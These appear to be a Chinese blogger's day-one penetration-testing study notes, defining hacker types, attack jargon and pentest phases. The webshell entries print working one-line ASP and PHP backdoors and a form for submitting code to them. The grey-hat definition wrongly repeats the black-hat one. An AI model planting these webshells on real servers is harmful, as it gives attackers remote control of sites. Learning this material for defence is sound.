2020-08-24渗透测试学些day01

2020-08-24  本文已影响0人  lessismore_3602

1、白帽子

专门研究或者从事网络安全行业的人,通常受雇于各大安全公司,是提高网络、系统安全水平的主要力量

2、黑帽子

专门研究木马、操作系统、寻找漏洞,并且以个人意志为出发点,攻击网络或者计算机。

3、灰帽子

专门研究木马、操作系统、寻找漏洞,并且以个人意志为出发点,攻击网络或者计算机。

术语词汇介绍

1、脚本(asp、php、jsp)

2、Html(css、js、HTML)

3、HTTP协议

4、CMS(B/S)

5、MD5

6、肉鸡:被黑客入侵并被长期驻扎的计算机或服务器

7、抓鸡:利用使用大量的漏洞,使用自动化方式获取肉鸡的行为。

8、Webshell:通过Web入侵的一种脚本工具,可以据此对网站服务进行一定程度的控制。

9、漏洞:硬件、软件、协议等可利用的安全缺陷,可能被攻击者利用,对数据进行篡改,控制等。

10、一句话木马:通过向服务端提交一句简短的代码,配合本地客户端实现Webshell功能的木马。

<%eval request(“pass”)%>

<%execute(request(“pass”))%>

Request(“pass”)接收客户端提交的数据,pass为执行命令的参数值。

eval/execute 函数执行客户端命令的内容。

11、php一句话木马:

<?php eval($_POST[cracer]);?>

下面的代码可以用POST的方式提交PHP语句,利用php脚本的各种函数,就可以实现执行系统命令、修改数据库、增删改文件等各种功能。

<from method=post action=http://木马地址>

<textarea name=cracer>

//这里写PHP代码

phpinfo();

</textarea>

<input type=submit>

</from>

12、提权:操作系统低权限的账户将自己升为管理员权限使用的方法

13、后门:黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下的一个“入口”

14、跳板:使用肉鸡IP来实现攻击其他目标,一遍更好的隐藏自己的身份信息。

15、旁站入侵:同服务器下的网站入侵,入侵之后可以通过提权、跨目录等手段拿到目标网站的权限。常见的旁站查询工具:WebRobot、御剑、明小子和Web在线查询等。

16、C端入侵:同C段下服务器入侵。利用一些黑客工具嗅探获取在网络上传输的各种信息。常用的工具有Windows下Cain,Linux下Sniffit、Snoop、Tcpdump、Dsniff等。

渗透测试流程:

1、明确目标:

确定范围、确定规则、确定需求

2、收集信息:

基础信息、系统信息、应用信息、版本信息、服务信息、人员信息、防护信息

3、漏洞探测:

系统漏洞、WebServer漏洞、Web应用漏洞、其他端口服务漏洞、通信安全

4、漏洞验证:

自动化验证、手工验证、试验验证、登录猜解、业务漏洞验证、公开资源的利用

5、信息整理:

整理渗透工具、整理收集信息

6、信息分析:

精准打击、绕过防御机制、制定攻击路径、绕过检测机制

7、获取所需:

实施攻击、获取内部信息、进一步渗透、持续性存在、清理痕迹

8、形成报告:

按需整理、补充介绍、修补建议。

上一篇 下一篇

猜你喜欢

热点阅读